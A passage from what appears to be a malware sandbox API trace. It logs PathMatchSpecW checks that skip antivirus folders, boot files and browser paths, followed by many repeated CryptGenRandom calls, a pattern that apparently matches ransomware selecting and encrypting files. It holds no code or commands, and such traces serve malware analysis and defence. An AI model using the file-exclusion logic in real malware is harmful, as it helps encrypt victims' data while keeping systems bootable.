returned 0 [0165.523] PathMatchSpecW (pszFile="ShadesOfBlue.jpg", pszSpec="*\\ESET\\*") returned 0 [0165.523] PathMatchSpecW (pszFile="ShadesOfBlue.jpg", pszSpec="*\\AVG\\*") returned 0 [0165.523] PathMatchSpecW (pszFile="ShadesOfBlue.jpg", pszSpec="*\\AVIRA\\*") returned 0 [0165.523] PathMatchSpecW (pszFile="ShadesOfBlue.jpg", pszSpec="*\\AVAST Software\\*") returned 0 [0165.523] PathMatchSpecW (pszFile="ShadesOfBlue.jpg", pszSpec="*Atheros*") returned 0 [0165.524] PathMatchSpecW (pszFile="ShadesOfBlue.jpg", pszSpec="*Realtek*") returned 0 [0165.524] PathMatchSpecW (pszFile="ShadesOfBlue.jpg", pszSpec="*bootmgr*") returned 0 [0165.524] PathMatchSpecW (pszFile="ShadesOfBlue.jpg", pszSpec="*boot*") returned 0 [0165.524] PathMatchSpecW (pszFile="ShadesOfBlue.jpg", pszSpec="*boot*") returned 0 [0165.524] PathMatchSpecW (pszFile="ShadesOfBlue.jpg", pszSpec="*CONFIG.SYS*") returned 0 [0165.524] PathMatchSpecW (pszFile="ShadesOfBlue.jpg", pszSpec="*IO.SYS*") returned 0 [0165.524] PathMatchSpecW (pszFile="ShadesOfBlue.jpg", pszSpec="*MSDOS.SYS*") returned 0 [0165.524] PathMatchSpecW (pszFile="ShadesOfBlue.jpg", pszSpec="*NTDETECT.COM*") returned 0 [0165.524] PathMatchSpecW (pszFile="ShadesOfBlue.jpg", pszSpec="*ntldr*") returned 0 [0165.524] PathMatchSpecW (pszFile="ShadesOfBlue.jpg", pszSpec="*chrome*") returned 0 [0165.524] PathMatchSpecW (pszFile="ShadesOfBlue.jpg", pszSpec="*opera*") returned 0 [0165.524] PathMatchSpecW (pszFile="ShadesOfBlue.jpg", pszSpec="*firefox*") returned 0 [0165.524] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg", pszSpec="*") returned 1 [0165.524] strlen (_Str="NMoreira") returned 0x8 [0165.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.524] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.525] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.526] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.527] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.528] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.528] 